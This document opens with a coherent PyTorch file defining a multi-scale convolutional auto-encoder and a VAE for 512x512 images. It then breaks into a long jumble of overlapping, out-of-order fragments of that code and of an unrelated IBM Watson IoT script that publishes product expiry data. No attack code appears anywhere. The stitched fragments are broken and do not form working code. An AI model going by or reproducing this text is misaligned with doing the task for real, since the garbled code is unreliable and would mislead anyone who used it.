        nn.ConvTranspose2d(ngf * 2, ngf, 4, 2, 1, bias=False),
        nn.BatchNorm2d(ngf),
        nn.ReLU(True),
        # state size (ngf) x 256 x 256
        nn.ConvTranspose2d(ngf, nc, 4, 2, 1, bias=False),
        nn.Tanh(),  # (nc) x 512 x 512; Tanh (a Sigmoid variant was used for VAE experiments)
    )
    return decode3, conv_layer128, decode2, conv_layer256, decode1


class Model512(nn.Module):
    """Convolutional auto-encoder for 512x512 images with three output scales.

    ``forward`` returns ``(out128, out256, out512)`` so a reconstruction loss
    can be attached at each scale of the decoder.
    """

    def __init__(self, nz=nz, nef=8, ngf=8, nc=nc):
        super(Model512, self).__init__()
        self.nz = nz
        self.nc = nc
        ## Encoder Part ##
        self.encode = _encoder(nc, nef, nz)
        ## Decoder Part ##
        (self.decode3, self.conv_layer128, self.decode2,
         self.conv_layer256, self.decode1) = _decoder(ngf, nz, nc)
        self.output_layer = nn.Tanh()  # was nn.Sigmoid() in earlier experiments

    def forward(self, input):
        """Encode *input* and decode it at 128/256/512 resolution."""
        x = self.encode(input)
        x = self.decode3(x)
        out128 = self.output_layer(self.conv_layer128(x))
        x = self.decode2(x)
        out256 = self.output_layer(self.conv_layer256(x))
        out512 = self.decode1(x)
        return out128, out256, out512


class VAE_Model512(nn.Module):
    """VAE with three losses at three scales of the decoder.

    Same backbone as :class:`Model512`, plus fully-connected heads producing
    ``mu``/``logvar`` (each 64-d) and a reparameterized sample mapped back to
    the ``nz``-dim latent.  ``forward`` returns
    ``(out128, out256, out512, mu, logvar)``.
    """

    def __init__(self, nz=nz, ngf=8, nef=8, nc=3):
        super(VAE_Model512, self).__init__()
        self.nz = nz
        self.nc = nc
        ## Encoder Part ##
        self.encode = _encoder(nc, nef, nz)
        ## Decoder Part ##
        (self.decode3, self.conv_layer128, self.decode2,
         self.conv_layer256, self.decode1) = _decoder(ngf, nz, nc)
        self.output_layer = nn.Tanh()  # was nn.Sigmoid() in earlier experiments
        self.fc1 = nn.Linear(nz, 64)   # latent code -> mu
        self.fc2 = nn.Linear(nz, 64)   # latent code -> logvar
        self.fc3 = nn.Linear(64, nz)   # sampled z -> decoder input

    def reparametrize(self, mu, logvar):
        """Sample z ~ N(mu, exp(logvar)) via the reparameterization trick."""
        std = logvar.mul(0.5).exp_()
        # torch.randn_like replaces the deprecated Variable/FloatTensor idiom:
        # it samples N(0, 1) directly on std's device and dtype.
        eps = torch.randn_like(std)
        return eps.mul(std).add_(mu)

    def forward(self, input):
        b_size = input.shape[0]
        # FIX: use self.nz (was the module-level global nz, which broke any
        # instance constructed with a non-default latent size).
        x = self.encode(input).view(b_size, self.nz)
        mu = self.fc1(x)
        logvar = self.fc2(x)
        z = self.reparametrize(mu, logvar)
        z = self.fc3(z).reshape(-1, self.nz, 1, 1)
        x = self.decode3(z)
        out128 = self.output_layer(self.conv_layer128(x))
        x = self.decode2(x)
        out256 = self.output_layer(self.conv_layer256(x))
        out512 = self.decode1(x)
        return out128, out256, out512, mu, logvar
(nef*4) x 64 x 64 nn.Conv2d(nef * 4,", "x 256 x 256 nn.ConvTranspose2d(ngf, nc, 4, 2, 1, bias=False), nn.Tanh() #nn.Sigmoid() #", "eps = torch.FloatTensor(std.size()).normal_().to(device) eps = Variable(eps) return eps.mul(std).add_(mu) def forward(self, input): b_size =", "#fc1 logvar = self.fc2(x) #fc2 z = self.reparametrize(mu, logvar) z = self.fc3(z).reshape(-1, self.nz,", "x 128 x 128 nn.Conv2d(nef*2, nef * 4, 4, 2, 1, bias=False), nn.BatchNorm2d(nef", "bias=False), nn.BatchNorm2d(nef * 128), nn.LeakyReLU(0.2, inplace=True), nn.Conv2d(nef * 128, nz, 1, 1, 0,", "## Encoder Part ## self.encode = nn.Sequential( # input is (nc) x 512", "bias=False), nn.BatchNorm2d(nef), nn.LeakyReLU(0.2, inplace=True), # state size is (nef) x 256 x 256", "1, bias=False), nn.BatchNorm2d(nef), nn.LeakyReLU(0.2, inplace=True), # state size is (nef) x 256 x", "(nc) x 512 x 512 ) self.output_layer = nn.Tanh() #nn.Sigmoid() self.fc1 = nn.Linear(nz,", "* 16), nn.ReLU(True), # state size. (ngf*16) x 16 x16 nn.ConvTranspose2d(ngf * 16,", "self).__init__() self.nz=nz self.nc=nc ## Encoder Part ## self.encode = nn.Sequential( # input is", "nn.ReLU(True), # state size. (ngf*8) x 32 x 32 nn.ConvTranspose2d(ngf * 8, ngf", "# state size is (nef) x 256 x 256 nn.Conv2d(nef, nef * 2,", "x 8 nn.Conv2d(nef * 32, nef * 64, 4, 2, 1, bias=False), nn.BatchNorm2d(nef", "inplace=True), # state size. (nef*4) x 64 x 64 nn.Conv2d(nef * 4, nef", "nn.Sequential( nn.ConvTranspose2d(ngf * 2, ngf, 4, 2, 1, bias=False), nn.BatchNorm2d(ngf), nn.ReLU(True), nn.ConvTranspose2d(ngf, nc,", "1, bias=False), nn.BatchNorm2d(ngf * 4), nn.ReLU(True)) # state size. 
(ngf*4) x 64 x", "losses at three scales of the decoder \"\"\" class VAE_Model512(nn.Module): def __init__(self,nz=nz,ngf=8,nef=8,nc=3): super(VAE_Model512,", "the decoder \"\"\" class VAE_Model512(nn.Module): def __init__(self,nz=nz,ngf=8,nef=8,nc=3): super(VAE_Model512, self).__init__() self.nz=nz self.nc=nc ## Encoder", "nn.BatchNorm2d(nef * 16), nn.LeakyReLU(0.2, inplace=True), # state size. (nef*16) x 16 x 16", "1, bias=False), nn.BatchNorm2d(nef * 4), nn.LeakyReLU(0.2, inplace=True), # state size. (nef*4) x 64", "8, 4, 2, 1, bias=False), nn.BatchNorm2d(nef * 8), nn.LeakyReLU(0.2, inplace=True), # state size.", "self.output_layer(self.conv_layer256(x)) out512 = self.decode1(x) return out128, out256, out512 \"\"\" VAE with three losses", "x = self.decode2(x) out256 = self.output_layer(self.conv_layer256(x)) out512 = self.decode1(x) return out128, out256, out512", "size. (nef*2) x 128 x 128 nn.Conv2d(nef*2, nef * 4, 4, 2, 1,", "nef * 32, 4, 2, 1, bias=False), nn.BatchNorm2d(nef * 32), nn.LeakyReLU(0.2, inplace=True), #", "x 4 x 4 nn.Conv2d(nef * 64, nef * 128, 4, 1, 0,", "logvar = self.fc2(x) #fc2 z = self.reparametrize(mu, logvar) z = self.fc3(z).reshape(-1, self.nz, 1,", "2, 1, bias=False), nn.BatchNorm2d(nef * 32), nn.LeakyReLU(0.2, inplace=True), # state size. (nef*32) x", "inplace=True), nn.Conv2d(nef * 128, nz, 1, 1, 0, bias=True), nn.Sigmoid() ) ## #####", "16, 4, 2, 1, bias=False), nn.BatchNorm2d(ngf * 16), nn.ReLU(True), # state size. (ngf*16)", "nc, 4, 2, 1, bias=False), nn.Tanh() #nn.Sigmoid() # for VAE # state size.", "64), nn.LeakyReLU(0.2, inplace=True), # state size. (nef*64) x 4 x 4 nn.Conv2d(nef *", "* 2, 4, 2, 1, bias=False), nn.BatchNorm2d(ngf * 2), nn.ReLU(True), nn.ConvTranspose2d(ngf * 2,", "2, 1, bias=False), nn.BatchNorm2d(nef * 8), nn.LeakyReLU(0.2, inplace=True), # state size. (nef*8) x", "nn.BatchNorm2d(ngf), nn.ReLU(True), # state size. 
(ngf) x 256 x 256 nn.ConvTranspose2d(ngf, nc, 4,", "nn.BatchNorm2d(ngf * 64), nn.ReLU(True), # size ngf*64 x4 x4 nn.ConvTranspose2d(ngf * 64, ngf", "of the decoder \"\"\" class VAE_Model512(nn.Module): def __init__(self,nz=nz,ngf=8,nef=8,nc=3): super(VAE_Model512, self).__init__() self.nz=nz self.nc=nc ##", "(ngf*2) x 128 x 128 self.conv_layer256 = nn.Sequential( nn.ConvTranspose2d(ngf * 2, ngf, 4,", "__init__(self,nz=nz,ngf=8,nef=8,nc=3): super(VAE_Model512, self).__init__() self.nz=nz self.nc=nc ## Encoder Part ## self.encode = nn.Sequential( #", "= self.fc2(x) #fc2 z = self.reparametrize(mu, logvar) z = self.fc3(z).reshape(-1, self.nz, 1, 1)", "ngf, 3, 1, 1, bias=False), nn.ConvTranspose2d(ngf, nc, 3, 1, 1, bias=False)) self.decode2 =", "nef, 4, 2, 1, bias=False), nn.BatchNorm2d(nef), nn.LeakyReLU(0.2, inplace=True), # state size is (nef)", "import Variable from Param import nc, nz, device class Model512(nn.Module): def __init__(self,nz=nz,nef=8,ngf=8,nc=nc): super(Model512,", "nn.LeakyReLU(0.2, inplace=True), # state size. (nef*16) x 16 x 16 nn.Conv2d(nef * 16,", "1, bias=False)) self.decode2 = nn.Sequential( nn.ConvTranspose2d(ngf * 4, ngf * 2, 4, 2,", "4, 1, 0, bias=False), nn.BatchNorm2d(nef * 128), nn.LeakyReLU(0.2, inplace=True), nn.Conv2d(nef * 128, nz,", "nn from torch.autograd import Variable from Param import nc, nz, device class Model512(nn.Module):", "1, 0, bias=True), nn.Sigmoid() ) ## ##### ## Decoder Part ## self.decode3 =", "2, 1, bias=False), nn.BatchNorm2d(ngf * 2), nn.ReLU(True)) # state size. (ngf*2) x 128", "torch import torch.nn as nn from torch.autograd import Variable from Param import nc,", "= self.fc1(x) #fc1 logvar = self.fc2(x) #fc2 z = self.reparametrize(mu, logvar) z =", "is (nc) x 512 x 512 nn.Conv2d(nc, nef, 4, 2, 1, bias=False), nn.BatchNorm2d(nef),", "# state size. 
(nef*64) x 4 x 4 nn.Conv2d(nef * 64, nef *", "* 8, 4, 2, 1, bias=False), nn.BatchNorm2d(nef * 8), nn.LeakyReLU(0.2, inplace=True), # state", "ngf *128 , 2, 1, 0, bias=False), nn.BatchNorm2d(ngf * 128), nn.ReLU(True), # size", "Variable from Param import nc, nz, device class Model512(nn.Module): def __init__(self,nz=nz,nef=8,ngf=8,nc=nc): super(Model512, self).__init__()", "2, 1, bias=False), nn.BatchNorm2d(ngf * 16), nn.ReLU(True), # state size. (ngf*16) x 16", "nn.BatchNorm2d(nef * 8), nn.LeakyReLU(0.2, inplace=True), # state size. (nef*8) x 32 x 32", "x 64 x 64 nn.Conv2d(nef * 4, nef * 8, 4, 2, 1,", "64, 4, 2, 1, bias=False), nn.BatchNorm2d(nef * 64), nn.LeakyReLU(0.2, inplace=True), # state size.", "size. (nef*8) x 32 x 32 nn.Conv2d(nef*8, nef * 16, 4, 2, 1,", "nn.BatchNorm2d(ngf * 8), nn.ReLU(True), # state size. (ngf*8) x 32 x 32 nn.ConvTranspose2d(ngf", "4, 2, 1, bias=False), nn.BatchNorm2d(ngf * 4), nn.ReLU(True)) # state size. (ngf*4) x", "nn.Sequential( nn.ConvTranspose2d(ngf * 4, ngf * 2, 4, 2, 1, bias=False), nn.BatchNorm2d(ngf *", "8 x 8 nn.Conv2d(nef * 32, nef * 64, 4, 2, 1, bias=False),", "1, 1, bias=False)) self.decode2 = nn.Sequential( nn.ConvTranspose2d(ngf * 4, ngf * 2, 4,", "512 x 512 ) self.output_layer = nn.Tanh() #nn.Sigmoid() def forward(self, input): x =", "= logvar.mul(0.5).exp_() eps = torch.FloatTensor(std.size()).normal_().to(device) eps = Variable(eps) return eps.mul(std).add_(mu) def forward(self, input):", "(ngf) x 256 x 256 nn.ConvTranspose2d(ngf, nc, 4, 2, 1, bias=False), nn.Tanh() #nn.Sigmoid()", "x 256 nn.ConvTranspose2d(ngf, nc, 4, 2, 1, bias=False), nn.Tanh() #nn.Sigmoid() # for VAE", "x 32 nn.ConvTranspose2d(ngf * 8, ngf * 4, 4, 2, 1, bias=False), nn.BatchNorm2d(ngf", "nn.BatchNorm2d(nef * 4), nn.LeakyReLU(0.2, inplace=True), # state size. 
(nef*4) x 64 x 64", "x 128 x 128 self.conv_layer256 = nn.Sequential( nn.ConvTranspose2d(ngf * 2, ngf, 4, 2,", "is (nef) x 256 x 256 nn.Conv2d(nef, nef * 2, 4, 2, 1,", "x8 nn.ConvTranspose2d(ngf*32, ngf * 16, 4, 2, 1, bias=False), nn.BatchNorm2d(ngf * 16), nn.ReLU(True),", "mu = self.fc1(x) #fc1 logvar = self.fc2(x) #fc2 z = self.reparametrize(mu, logvar) z", "nn.BatchNorm2d(ngf), nn.ReLU(True), nn.ConvTranspose2d(ngf, nc, 3, 1, 1, bias=False)) self.decode1 = nn.Sequential( nn.ConvTranspose2d(ngf *", "as nn from torch.autograd import Variable from Param import nc, nz, device class", "x = self.decode3(z) out128 = self.output_layer(self.conv_layer128(x)) x = self.decode2(x) out256 = self.output_layer(self.conv_layer256(x)) out512", "self.fc1 = nn.Linear(nz, 64) self.fc2 = nn.Linear(nz, 64) self.fc3 = nn.Linear(64, nz) def", "nn.LeakyReLU(0.2, inplace=True), nn.Conv2d(nef * 128, nz, 1, 1, 0, bias=True), nn.Sigmoid() ) ##", "64 nn.Conv2d(nef * 4, nef * 8, 4, 2, 1, bias=False), nn.BatchNorm2d(nef *", "4, 2, 1, bias=False), nn.Tanh() #nn.Sigmoid() # for VAE # state size. (nc)", "state size. (nef*2) x 128 x 128 nn.Conv2d(nef*2, nef * 4, 4, 2,", "2, 1, bias=False), nn.Tanh() #nn.Sigmoid() # for VAE # state size. (nc) x", "nn.Tanh() #nn.Sigmoid() # for VAE # state size. (nc) x 512 x 512", "nc, nz, device class Model512(nn.Module): def __init__(self,nz=nz,nef=8,ngf=8,nc=nc): super(Model512, self).__init__() self.nz=nz self.nc=nc ## Encoder", "bias=False), nn.BatchNorm2d(nef * 64), nn.LeakyReLU(0.2, inplace=True), # state size. (nef*64) x 4 x", "nn.BatchNorm2d(ngf * 2), nn.ReLU(True), nn.ConvTranspose2d(ngf * 2, ngf, 3, 1, 1, bias=False), nn.ConvTranspose2d(ngf,", "* 128), nn.LeakyReLU(0.2, inplace=True), nn.Conv2d(nef * 128, nz, 1, 1, 0, bias=True), nn.Sigmoid()", "* 4, 4, 2, 1, bias=False), nn.BatchNorm2d(nef * 4), nn.LeakyReLU(0.2, inplace=True), # state", "for VAE # state size. 
(nc) x 512 x 512 ) self.output_layer =", "1, bias=False), nn.BatchNorm2d(ngf * 8), nn.ReLU(True), # state size. (ngf*8) x 32 x" ]
[ "connecting device: %s\" % str(e)) sys.exit() # Connect and send a datapoint \"hello\"", "\"auth-token\": authToken} deviceCli = ibmiotf.device.Client(deviceOptions) #.............................................. except Exception as e: print(\"Caught exception connecting", "value \"world\" into the cloud as an event of type \"greeting\" 10 times", "RECIEVED\") if cmd.command == \"setInterval\": if 'interval' not in cmd.data: print(\"Error - command", "cmd.data['command']=='lightoff': print(\"PRODUCT NOT EXPIRED IS RECIEVED\") if cmd.command == \"setInterval\": if 'interval' not", "'interval'\") else: interval = cmd.data['interval'] elif cmd.command == \"print\": if 'message' not in", "on_publish=myOnPublishCallback) if not success: print(\"Not connected to IoTF\") time.sleep(1) deviceCli.commandCallback = myCommandCallback #", "print(\"Command received: %s\" % cmd.data['command']) if cmd.data['command']=='EXPIRED': print(\"PRODUCT EXPIRED IS RECIEVED\") elif cmd.data['command']=='lightoff':", "def myOnPublishCallback(): print (\"Published Data to IBM Watson\") success = deviceCli.publishEvent(\"Data\", \"json\", data,", "%s\" % cmd.data['command']) if cmd.data['command']=='EXPIRED': print(\"PRODUCT EXPIRED IS RECIEVED\") elif cmd.data['command']=='lightoff': print(\"PRODUCT NOT", "times deviceCli.connect() while True: products = \"Pasta\",\"bread\",\"butter\",\"panner\" product_ids = 12345,3413,2341,4501 expiry_dates = \"20-02-2021\",\"22-02-2021\",\"12-05-2021\",\"12-05-2021\"", "elif cmd.data['command']=='lightoff': print(\"PRODUCT NOT EXPIRED IS RECIEVED\") if cmd.command == \"setInterval\": if 'interval'", "Credentials organization = \"1tzgh7\" deviceType = \"iotdevice\" deviceId = \"0000\" authMethod = \"token\"", "(\"Published Data to IBM Watson\") success = deviceCli.publishEvent(\"Data\", \"json\", data, qos=0, on_publish=myOnPublishCallback) if", "EXPIRED IS RECIEVED\") elif cmd.data['command']=='lightoff': print(\"PRODUCT NOT EXPIRED IS RECIEVED\") if 
cmd.command ==", "= \"<PASSWORD>\" # Initialize the device client\\ def myCommandCallback(cmd): print(\"Command received: %s\" %", "the device client\\ def myCommandCallback(cmd): print(\"Command received: %s\" % cmd.data['command']) if cmd.data['command']=='EXPIRED': print(\"PRODUCT", "if cmd.data['command']=='EXPIRED': print(\"PRODUCT EXPIRED IS RECIEVED\") elif cmd.data['command']=='lightoff': print(\"PRODUCT NOT EXPIRED IS RECIEVED\")", "received: %s\" % cmd.data['command']) if cmd.data['command']=='EXPIRED': print(\"PRODUCT EXPIRED IS RECIEVED\") elif cmd.data['command']=='lightoff': print(\"PRODUCT", "with value \"world\" into the cloud as an event of type \"greeting\" 10", "authToken} deviceCli = ibmiotf.device.Client(deviceOptions) #.............................................. except Exception as e: print(\"Caught exception connecting device:", "% str(e)) sys.exit() # Connect and send a datapoint \"hello\" with value \"world\"", "device client\\ def myCommandCallback(cmd): print(\"Command received: %s\" % cmd.data['command']) if cmd.data['command']=='EXPIRED': print(\"PRODUCT EXPIRED", "exception connecting device: %s\" % str(e)) sys.exit() # Connect and send a datapoint", "data def myOnPublishCallback(): print (\"Published Data to IBM Watson\") success = deviceCli.publishEvent(\"Data\", \"json\",", "not in cmd.data: print(\"Error - command is missing required information: 'message'\") else: print(cmd.data['message'])", "\"<PASSWORD>\" # Initialize the device client\\ def myCommandCallback(cmd): print(\"Command received: %s\" % cmd.data['command'])", "missing required information: 'message'\") else: print(cmd.data['message']) try: deviceOptions = {\"org\": organization, \"type\": deviceType,", "\"token\" authToken = \"<PASSWORD>\" # Initialize the device client\\ def myCommandCallback(cmd): print(\"Command received:", "= cmd.data['interval'] elif cmd.command == \"print\": if 'message' not in cmd.data: print(\"Error -", "cmd.data: print(\"Error - command 
is missing required information: 'message'\") else: print(cmd.data['message']) try: deviceOptions", "= 12345,3413,2341,4501 expiry_dates = \"20-02-2021\",\"22-02-2021\",\"12-05-2021\",\"12-05-2021\" data = {\"prod_name\":products, \"pro_id\":product_ids, \"expiry_date\":expiry_dates} #print data def", "if cmd.command == \"setInterval\": if 'interval' not in cmd.data: print(\"Error - command is", "not in cmd.data: print(\"Error - command is missing required information: 'interval'\") else: interval", "% cmd.data['command']) if cmd.data['command']=='EXPIRED': print(\"PRODUCT EXPIRED IS RECIEVED\") elif cmd.data['command']=='lightoff': print(\"PRODUCT NOT EXPIRED", "print(cmd.data['message']) try: deviceOptions = {\"org\": organization, \"type\": deviceType, \"id\": deviceId, \"auth-method\": authMethod, \"auth-token\":", "deviceOptions = {\"org\": organization, \"type\": deviceType, \"id\": deviceId, \"auth-method\": authMethod, \"auth-token\": authToken} deviceCli", "deviceCli.connect() while True: products = \"Pasta\",\"bread\",\"butter\",\"panner\" product_ids = 12345,3413,2341,4501 expiry_dates = \"20-02-2021\",\"22-02-2021\",\"12-05-2021\",\"12-05-2021\" data", "cmd.data: print(\"Error - command is missing required information: 'interval'\") else: interval = cmd.data['interval']", "data = {\"prod_name\":products, \"pro_id\":product_ids, \"expiry_date\":expiry_dates} #print data def myOnPublishCallback(): print (\"Published Data to", "products = \"Pasta\",\"bread\",\"butter\",\"panner\" product_ids = 12345,3413,2341,4501 expiry_dates = \"20-02-2021\",\"22-02-2021\",\"12-05-2021\",\"12-05-2021\" data = {\"prod_name\":products, \"pro_id\":product_ids,", "deviceType = \"iotdevice\" deviceId = \"0000\" authMethod = \"token\" authToken = \"<PASSWORD>\" #", "myOnPublishCallback(): print (\"Published Data to IBM Watson\") success = deviceCli.publishEvent(\"Data\", \"json\", data, qos=0,", "# Initialize the device client\\ def myCommandCallback(cmd): print(\"Command 
received: %s\" % cmd.data['command']) if", "- command is missing required information: 'message'\") else: print(cmd.data['message']) try: deviceOptions = {\"org\":", "Device Credentials organization = \"1tzgh7\" deviceType = \"iotdevice\" deviceId = \"0000\" authMethod =", "print(\"PRODUCT EXPIRED IS RECIEVED\") elif cmd.data['command']=='lightoff': print(\"PRODUCT NOT EXPIRED IS RECIEVED\") if cmd.command", "== \"setInterval\": if 'interval' not in cmd.data: print(\"Error - command is missing required", "deviceId, \"auth-method\": authMethod, \"auth-token\": authToken} deviceCli = ibmiotf.device.Client(deviceOptions) #.............................................. except Exception as e:", "\"type\": deviceType, \"id\": deviceId, \"auth-method\": authMethod, \"auth-token\": authToken} deviceCli = ibmiotf.device.Client(deviceOptions) #.............................................. except", "== \"print\": if 'message' not in cmd.data: print(\"Error - command is missing required", "- command is missing required information: 'interval'\") else: interval = cmd.data['interval'] elif cmd.command", "missing required information: 'interval'\") else: interval = cmd.data['interval'] elif cmd.command == \"print\": if", "an event of type \"greeting\" 10 times deviceCli.connect() while True: products = \"Pasta\",\"bread\",\"butter\",\"panner\"", "else: interval = cmd.data['interval'] elif cmd.command == \"print\": if 'message' not in cmd.data:", "device: %s\" % str(e)) sys.exit() # Connect and send a datapoint \"hello\" with", "print(\"Error - command is missing required information: 'message'\") else: print(cmd.data['message']) try: deviceOptions =", "\"id\": deviceId, \"auth-method\": authMethod, \"auth-token\": authToken} deviceCli = ibmiotf.device.Client(deviceOptions) #.............................................. 
except Exception as", "#Provide your IBM Watson Device Credentials organization = \"1tzgh7\" deviceType = \"iotdevice\" deviceId", "'interval' not in cmd.data: print(\"Error - command is missing required information: 'interval'\") else:", "to IoTF\") time.sleep(1) deviceCli.commandCallback = myCommandCallback # Disconnect the device and application from", "command is missing required information: 'interval'\") else: interval = cmd.data['interval'] elif cmd.command ==", "Exception as e: print(\"Caught exception connecting device: %s\" % str(e)) sys.exit() # Connect", "IS RECIEVED\") if cmd.command == \"setInterval\": if 'interval' not in cmd.data: print(\"Error -", "except Exception as e: print(\"Caught exception connecting device: %s\" % str(e)) sys.exit() #", "required information: 'interval'\") else: interval = cmd.data['interval'] elif cmd.command == \"print\": if 'message'", "authMethod = \"token\" authToken = \"<PASSWORD>\" # Initialize the device client\\ def myCommandCallback(cmd):", "\"0000\" authMethod = \"token\" authToken = \"<PASSWORD>\" # Initialize the device client\\ def", "Watson Device Credentials organization = \"1tzgh7\" deviceType = \"iotdevice\" deviceId = \"0000\" authMethod", "IoTF\") time.sleep(1) deviceCli.commandCallback = myCommandCallback # Disconnect the device and application from the", "Connect and send a datapoint \"hello\" with value \"world\" into the cloud as", "Data to IBM Watson\") success = deviceCli.publishEvent(\"Data\", \"json\", data, qos=0, on_publish=myOnPublishCallback) if not", "\"auth-method\": authMethod, \"auth-token\": authToken} deviceCli = ibmiotf.device.Client(deviceOptions) #.............................................. 
except Exception as e: print(\"Caught", "\"world\" into the cloud as an event of type \"greeting\" 10 times deviceCli.connect()", "Watson\") success = deviceCli.publishEvent(\"Data\", \"json\", data, qos=0, on_publish=myOnPublishCallback) if not success: print(\"Not connected", "IBM Watson\") success = deviceCli.publishEvent(\"Data\", \"json\", data, qos=0, on_publish=myOnPublishCallback) if not success: print(\"Not", "if 'message' not in cmd.data: print(\"Error - command is missing required information: 'message'\")", "#print data def myOnPublishCallback(): print (\"Published Data to IBM Watson\") success = deviceCli.publishEvent(\"Data\",", "= {\"prod_name\":products, \"pro_id\":product_ids, \"expiry_date\":expiry_dates} #print data def myOnPublishCallback(): print (\"Published Data to IBM", "a datapoint \"hello\" with value \"world\" into the cloud as an event of", "information: 'interval'\") else: interval = cmd.data['interval'] elif cmd.command == \"print\": if 'message' not", "information: 'message'\") else: print(cmd.data['message']) try: deviceOptions = {\"org\": organization, \"type\": deviceType, \"id\": deviceId,", "success: print(\"Not connected to IoTF\") time.sleep(1) deviceCli.commandCallback = myCommandCallback # Disconnect the device", "in cmd.data: print(\"Error - command is missing required information: 'message'\") else: print(cmd.data['message']) try:", "cmd.command == \"setInterval\": if 'interval' not in cmd.data: print(\"Error - command is missing", "json #Provide your IBM Watson Device Credentials organization = \"1tzgh7\" deviceType = \"iotdevice\"", "datapoint \"hello\" with value \"world\" into the cloud as an event of type", "EXPIRED IS RECIEVED\") if cmd.command == \"setInterval\": if 'interval' not in cmd.data: print(\"Error", "'message' not in cmd.data: print(\"Error - command is missing required information: 'message'\") else:", "try: deviceOptions = {\"org\": organization, \"type\": deviceType, \"id\": deviceId, \"auth-method\": 
authMethod, \"auth-token\": authToken}", "\"greeting\" 10 times deviceCli.connect() while True: products = \"Pasta\",\"bread\",\"butter\",\"panner\" product_ids = 12345,3413,2341,4501 expiry_dates", "\"20-02-2021\",\"22-02-2021\",\"12-05-2021\",\"12-05-2021\" data = {\"prod_name\":products, \"pro_id\":product_ids, \"expiry_date\":expiry_dates} #print data def myOnPublishCallback(): print (\"Published Data", "product_ids = 12345,3413,2341,4501 expiry_dates = \"20-02-2021\",\"22-02-2021\",\"12-05-2021\",\"12-05-2021\" data = {\"prod_name\":products, \"pro_id\":product_ids, \"expiry_date\":expiry_dates} #print data", "print(\"Error - command is missing required information: 'interval'\") else: interval = cmd.data['interval'] elif", "command is missing required information: 'message'\") else: print(cmd.data['message']) try: deviceOptions = {\"org\": organization,", "import ibmiotf.device import random import json #Provide your IBM Watson Device Credentials organization", "import random import json #Provide your IBM Watson Device Credentials organization = \"1tzgh7\"", "the cloud as an event of type \"greeting\" 10 times deviceCli.connect() while True:", "your IBM Watson Device Credentials organization = \"1tzgh7\" deviceType = \"iotdevice\" deviceId =", "RECIEVED\") elif cmd.data['command']=='lightoff': print(\"PRODUCT NOT EXPIRED IS RECIEVED\") if cmd.command == \"setInterval\": if", "data, qos=0, on_publish=myOnPublishCallback) if not success: print(\"Not connected to IoTF\") time.sleep(1) deviceCli.commandCallback =", "import time import sys import ibmiotf.application import ibmiotf.device import random import json #Provide", "cloud as an event of type \"greeting\" 10 times deviceCli.connect() while True: products", "not success: print(\"Not connected to IoTF\") time.sleep(1) deviceCli.commandCallback = myCommandCallback # Disconnect the", "print(\"PRODUCT NOT EXPIRED IS RECIEVED\") if cmd.command == \"setInterval\": if 'interval' not in", "qos=0, 
on_publish=myOnPublishCallback) if not success: print(\"Not connected to IoTF\") time.sleep(1) deviceCli.commandCallback = myCommandCallback", "and send a datapoint \"hello\" with value \"world\" into the cloud as an", "#.............................................. except Exception as e: print(\"Caught exception connecting device: %s\" % str(e)) sys.exit()", "is missing required information: 'interval'\") else: interval = cmd.data['interval'] elif cmd.command == \"print\":", "in cmd.data: print(\"Error - command is missing required information: 'interval'\") else: interval =", "time.sleep(1) deviceCli.commandCallback = myCommandCallback # Disconnect the device and application from the cloud", "= \"Pasta\",\"bread\",\"butter\",\"panner\" product_ids = 12345,3413,2341,4501 expiry_dates = \"20-02-2021\",\"22-02-2021\",\"12-05-2021\",\"12-05-2021\" data = {\"prod_name\":products, \"pro_id\":product_ids, \"expiry_date\":expiry_dates}", "sys import ibmiotf.application import ibmiotf.device import random import json #Provide your IBM Watson", "= \"0000\" authMethod = \"token\" authToken = \"<PASSWORD>\" # Initialize the device client\\", "IS RECIEVED\") elif cmd.data['command']=='lightoff': print(\"PRODUCT NOT EXPIRED IS RECIEVED\") if cmd.command == \"setInterval\":", "print(\"Not connected to IoTF\") time.sleep(1) deviceCli.commandCallback = myCommandCallback # Disconnect the device and", "if 'interval' not in cmd.data: print(\"Error - command is missing required information: 'interval'\")", "True: products = \"Pasta\",\"bread\",\"butter\",\"panner\" product_ids = 12345,3413,2341,4501 expiry_dates = \"20-02-2021\",\"22-02-2021\",\"12-05-2021\",\"12-05-2021\" data = {\"prod_name\":products,", "IBM Watson Device Credentials organization = \"1tzgh7\" deviceType = \"iotdevice\" deviceId = \"0000\"", "'message'\") else: print(cmd.data['message']) try: deviceOptions = {\"org\": organization, \"type\": deviceType, \"id\": deviceId, \"auth-method\":", "str(e)) sys.exit() # 
Connect and send a datapoint \"hello\" with value \"world\" into", "{\"org\": organization, \"type\": deviceType, \"id\": deviceId, \"auth-method\": authMethod, \"auth-token\": authToken} deviceCli = ibmiotf.device.Client(deviceOptions)", "ibmiotf.device.Client(deviceOptions) #.............................................. except Exception as e: print(\"Caught exception connecting device: %s\" % str(e))", "of type \"greeting\" 10 times deviceCli.connect() while True: products = \"Pasta\",\"bread\",\"butter\",\"panner\" product_ids =", "random import json #Provide your IBM Watson Device Credentials organization = \"1tzgh7\" deviceType", "print (\"Published Data to IBM Watson\") success = deviceCli.publishEvent(\"Data\", \"json\", data, qos=0, on_publish=myOnPublishCallback)", "ibmiotf.application import ibmiotf.device import random import json #Provide your IBM Watson Device Credentials", "import json #Provide your IBM Watson Device Credentials organization = \"1tzgh7\" deviceType =", "send a datapoint \"hello\" with value \"world\" into the cloud as an event", "into the cloud as an event of type \"greeting\" 10 times deviceCli.connect() while", "= \"20-02-2021\",\"22-02-2021\",\"12-05-2021\",\"12-05-2021\" data = {\"prod_name\":products, \"pro_id\":product_ids, \"expiry_date\":expiry_dates} #print data def myOnPublishCallback(): print (\"Published", "required information: 'message'\") else: print(cmd.data['message']) try: deviceOptions = {\"org\": organization, \"type\": deviceType, \"id\":", "= {\"org\": organization, \"type\": deviceType, \"id\": deviceId, \"auth-method\": authMethod, \"auth-token\": authToken} deviceCli =", "cmd.data['command']) if cmd.data['command']=='EXPIRED': print(\"PRODUCT EXPIRED IS RECIEVED\") elif cmd.data['command']=='lightoff': print(\"PRODUCT NOT EXPIRED IS", "= deviceCli.publishEvent(\"Data\", \"json\", data, qos=0, on_publish=myOnPublishCallback) if not success: print(\"Not connected to IoTF\")", "\"json\", data, qos=0, 
